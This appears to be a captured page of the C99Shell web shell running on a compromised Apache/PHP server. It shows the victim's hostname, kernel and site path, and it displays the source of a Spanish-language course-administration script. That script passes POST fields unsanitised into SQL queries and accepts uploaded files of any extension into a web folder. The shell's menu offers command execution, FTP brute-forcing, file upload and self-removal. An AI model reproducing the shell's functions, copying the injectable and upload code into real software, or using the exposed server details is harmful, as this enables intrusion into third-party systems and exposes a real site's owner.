!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.28 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     modificar-curso.php (4.94 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
session_start
();
$pagina_actual="administrar-cursos";
$categoria_actual="cursos";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

if (isset(
$_POST["id"])){
    
    
extract($_POSTEXTR_SKIP);
    
    
    
$nombre_archivo_pdf="";
    if (isset(
$_FILES["pdf"])){
        
$archivo=$_FILES["pdf"];           
        if (
$archivo["tmp_name"]!=""){
            
$timestamp=time();
            
$trozos explode("."$archivo["name"]); 
            
$extension end($trozos); 
            
$nombre_archivo_pdf=$timestamp.'.'.$extension;
            
copy($archivo["tmp_name"],$carpeta_programas_original.$nombre_archivo_pdf);
            
       
    
$result=$mysqli->query("
    UPDATE cursos SET 
    pdf='"
.utf8_decode($nombre_archivo_pdf)."'
    WHERE id='
$id'
    "
);        
       
        }
    }
    
    
$result=$mysqli->query("
    UPDATE cursos SET 
    fecha='"
.$fecha."',
    fecha_hasta='"
.$fecha_hasta."',
    titulo='"
.utf8_decode($titulo)."',
    detalle='"
.utf8_decode($detalle)."',
    id_programa='"
.$id_programa."',
    id_categoria='"
.$id_categoria."'
    WHERE id='
$id'
    "
);        
    
header('Location: administrar-cursos.php?exito=si');
}

if (isset(
$_GET["id"])){
    
$id=cadena_segura($_GET["id"],11);
    
    
$result=$mysqli->query("
    SELECT id, fecha, titulo, detalle, fecha_hasta, id_categoria, id_programa
    FROM cursos
    WHERE id='
$id'
    "
);
    
$item mysqli_fetch_assoc($result);
    
    
$categorias $mysqli->query("SELECT nombre, id FROM categorias_curso order by id");
$programas $mysqli->query("SELECT titulo, id FROM programas order by titulo");
/*
$paises = $mysqli->query("
SELECT p.id, p.nombre 
FROM pais p
ORDER by nombre
");
*/
?>
<div class="modal-content">
    <form method="post" action="modificar-curso.php" enctype="multipart/form-data">
    <input type="hidden" name="id" value="<?=$id?>">
    <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title"></h4>
    </div>
    <div class="modal-body row">
    
    <div class="form-group col-lg-6">
        <label>Categor&iacute;a: </label>
                 <select class="form-control top-buffer-sm radius-none" name="id_categoria">                        
                        <? $categoria=array();
                        while (
$categoria mysqli_fetch_assoc($categorias)){
                        
$n_categoria=$categoria['nombre'];?>
                            <option value="<?=$categoria["id"]?><? if ($categoria["id"]==$item["id_categoria"]){?>selected<? }?>><?=utf8_encode($categoria["nombre"])?></option>
                        <? }?>
                        
                    </select>
                
                </div>
                <div class="form-group col-lg-6">
                <label>Programa: </label>
                   <select class="form-control top-buffer-sm radius-none" name="id_programa">                       
                        <? $programa=array();
                        while (
$programa mysqli_fetch_assoc($programas)){
                        
$n_programa=$categoria['titulo'];?>
                            <option value="<?=$programa["id"]?><? if ($programa["id"]==$item["id_programa"]){?>selected<? }?>><?=utf8_encode($programa["titulo"])?></option>
                        <? }?>
                        
                    </select>
        </div>
        <div class="form-group col-lg-6">
            <label>Fecha desde</label>
            <input class="form-control" name="fecha" type="date" required value="<?=$item["fecha"]?>">
        </div>
        <div class="form-group col-lg-6">
            <label>Fecha hasta</label>
            <input class="form-control" name="fecha_hasta" type="date" required value="<?=$item["fecha_hasta"]?>">
        </div>  
        <div class="form-group col-lg-12">
            <label>Título</label>
            <input class="form-control" name="titulo" value="<?=utf8_encode($item["titulo"])?>">
        </div>  

        <div class="form-group col-lg-12">
            <label>Detalle</label>
            <textarea class="form-control" name="detalle" rows="10"><?=utf8_encode($item["detalle"])?></textarea>
        </div>
        
        <div class="form-group col-lg-12">
            <label>PDF</label>
            <input type="file" class="form-control" name="pdf">
        </div> 
        <? /*
        <div class="form-group">
            <label>País para paquetes</label>
            <select class="form-control" name="id_pais">
                <option value="0">Sin país (saldrán los paquetes recomendados)</option>
                <? while ($item2 = mysqli_fetch_assoc($paises)){?>
                <option value="<?=$item2["id"]?>" <?=$item["id_pais"]==$item2["id"]?"selected":""?>><?=utf8_encode($item2["nombre"])?></option>
                <? }?>
            </select>
        </div>   
        */ 
?>                               
    </div>
    <div class="modal-footer">
        <a href="#" class="btn btn-white" data-dismiss="modal">Cerrar</a>
        <input type="submit" class="btn btn-primary" value="Modificar">
    </div>
    </form>
</div><!-- /.modal-content -->
<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0145 ]--